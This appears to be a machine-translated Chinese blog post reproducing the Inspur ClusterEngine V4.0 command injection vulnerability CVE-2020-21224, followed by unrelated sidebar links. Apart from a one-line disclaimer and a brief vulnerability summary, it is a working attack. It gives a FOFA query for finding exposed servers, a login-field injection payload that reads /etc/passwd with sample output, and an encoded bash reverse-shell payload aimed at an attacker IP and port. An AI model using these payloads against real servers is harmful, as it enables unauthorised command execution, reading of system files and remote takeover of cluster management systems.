当前位置:网站首页>Inspur clusterenginev4.0 remote command execution vulnerability cve-2020-21224
Inspur clusterenginev4.0 remote command execution vulnerability cve-2020-21224
2022-07-28 23:43:00 【Chu Bing】
wave ClusterEngineV4.0 Remote command execution vulnerability CVE-2020-21224
This article is only for study , It is strictly forbidden to use it for illegal purposes , Otherwise, we will be responsible for the consequences .
Vulnerability profile
Dangerous characters in Inspur server cluster management system are not filtered , Causes remote command execution
Holes affect
wave ClusterEngineV4.0
FOFA grammar
title="TSCEV4.0"
Loophole recurrence
The login page is as follows

POC
POC test ( appear root:x:0:0 There are loopholes )
op=login&username=test`$(cat /etc/passwd)`
{"err":"/bin/sh: root:x:0:0:root:/root:/bin/bash: No such file or directory\n","exitcode":1,"out":"the user test does not exist\nerror:1\n"}
rebound shell
op=login&username=test`$(bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}}%2F{PORT}%200%3E%261)`

边栏推荐
- 可视化全链路日志追踪
- 解决线程安全问题&&单例模式
- 零念科技完成Pre-A轮融资,推动智能驾驶平台软件国产替代
- 金仓数据库KingbaseES 客户端编程接口指南 - ODBC特性支持约束
- What if win11 quick copy and paste cannot be used? Win11 shortcut copy and paste cannot be used
- 深度剖析集成学习Adaboost
- 经典双栈实现队列,注意遍历栈的判定条件修改。
- 1314_ Serial port technology_ Basic information of RS232 communication
- Design idea of room inventory in hotel reservation system database
- MySQL transaction and storage system
猜你喜欢
![[self] - question brushing - peak value](/img/cf/9c47da9c574b61415578e7fde8b126.png)
[self] - question brushing - peak value

字节8年女测试总监工作感悟—写给想转行或即将进入测试行业的女生们...

Mongodb index add, view, export, delete

可视化全链路日志追踪

电脑不知卸载什么,打不开计算器无法编辑截图功能打不开txt文件等等解决方案之一

新一代超安全蜂窝电池 思皓爱跑上市13.99万元起售

【自】-刷题-集合

Asynchronism and synchronization of visa write and read functions by LabVIEW

How to embed AI digital human function in VR panorama? Create a cloud experience

2022 simulated examination platform operation of hoisting machinery command examination questions
随机推荐
Binary search tree
MySQL introduction
事件抽取文献整理(2018)
Pin mapping relationship of stm32f103c series single chip microcomputer under Arduino framework
超参数优化(网格搜索和贝叶斯优化)
金仓数据库KingbaseES客户端编程接口指南-ODBC(5. 开发过程)
Rhce第一天
How strong is this glue?
Solve the exception that all control files are damaged
JS small method
LabVIEW对VISA Write和Read函数的异步和同步
The development mode of digital retail dominated by traffic is only the beginning
KingbaseES客户端编程接口指南-ODBC(4. 创建数据源)
【数据挖掘工程师-笔试】2022年大华股份
Merkle tree
刨根问底学 二叉树
Arduino uno driver universe 1.8 'TFT SPI screen example demonstration (including data package)
深度剖析集成学习Adaboost
Fundamental inquiry binary tree
With the "integration of driving and parking", freytek's high-performance domain controller leads the new track